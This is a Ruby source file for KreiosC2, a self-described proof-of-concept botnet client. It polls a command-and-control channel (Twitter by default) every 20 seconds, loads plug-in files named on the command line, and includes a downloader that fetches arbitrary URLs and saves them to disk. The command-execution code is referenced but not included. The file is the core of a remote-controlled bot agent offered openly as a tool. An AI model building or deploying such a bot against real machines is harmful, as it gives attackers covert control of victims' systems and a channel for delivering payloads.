#!/usr/bin/env ruby

require 'net/http'
require 'getoptlong'
require "default_language"
require "twitter_channel"
require "bot_commands"

# == KreiosC2: The commander for a bot written to use various methods as its C&C
#
# KreiosC2 has been built to be a flexible command and control system, it takes 
# plug-ins which enable the communication to be made over various medium.
# It is a proof of concept only
#
# == Usage
# KreiosC2 [OPTION]
#	--previous, -p: process historical commands
#	--channel x, -c x: use the specified command channel file
#	--language x, -l x:	use the specified command language file
#	--help, -h:	show help
#	-v: verbose
#
# Author:: Robin Wood (robin@digininja.org)
# Version:: 3.0
# Copyright:: Copyright (c) Robin Wood 2009
# Licence:: GPL
#

# Check if we are running on Windows
def is_windows?
	RUBY_PLATFORM =~ /(win|w)32$/
end

# Validate an IP address
def validate_ip(ip)
	return ip =~ /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/
end

# Download the specified url and save it as the given filename
# The file is only saved if a 200 is returned, the function then returns true
# Anything else and the function returns false
def download_file url, filename
	begin
		http_response = Net::HTTP.get_response(URI.parse(url))

		while (http_response.kind_of?(Net::HTTPRedirection))
			new_url = http_response['Location']
			http_response = Net::HTTP.get_response(URI.parse(new_url))
		end
		
		if !http_response.value.nil?
			return false
		end

		output = File.new filename,"w"
		output.print http_response.body
		output.close

		return true
	rescue
		return false
	end
end

opts = GetoptLong.new(
	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
	[ '--language', "-l" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--channel', "-c" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--previous', '-p', GetoptLong::NO_ARGUMENT ],
	[ "-v" , GetoptLong::NO_ARGUMENT ]
)

# Display the usage
def usage
	puts"KreiosC2 3.0 Robin Wood (robin@digininja.org) (www.digininja.org)

Usage: kreiosc2 [OPTION]
	--previous, -p: process historical commands
	--language x, -l x: use the specified command language file
	--channel x, -c x: use the specified command channel file
	--help, -h: show help
	-v: verbose

"
	exit
end

verbose=false
@latest_read=Time.new()

begin
	opts.each do |opt, arg|
		case opt
			when "--channel"
				filename=arg
				if File.exists?(filename)
					require filename
					puts "Using channel file " + filename
				else
					if verbose
						puts "Protcol file not found, using Twitter"
					end
				end
			when "--language"
				filename=arg
				if File.exists?(filename)
					require filename
					puts "Using language file " + filename
				else
					if verbose
						puts "Language file not found, using default"
					end
				end
			when '--previous'
				# setting this to nil means process all the previous commands
				# otherwise the default is to process from now
				@latest_read=nil
			when '--help'
				usage
			when '-v'
				verbose=true
		end
	end
rescue
	usage
end

interrupted = false

# Should really let the loop do the finish but if the interrupt happens during the sleep then you have to 
# wait for the sleep to finish which is boring
trap("INT") {
	interrupted = true
	puts "Goodbye"
	exit
}

while(!interrupted)
	begin
		if verbose
			puts "Checking for commands"
		end
		get_process_commands(verbose)
		if verbose
			puts "Sleeping"
		end
		sleep(20)
	rescue
		puts "rescue" + $!
	end
end
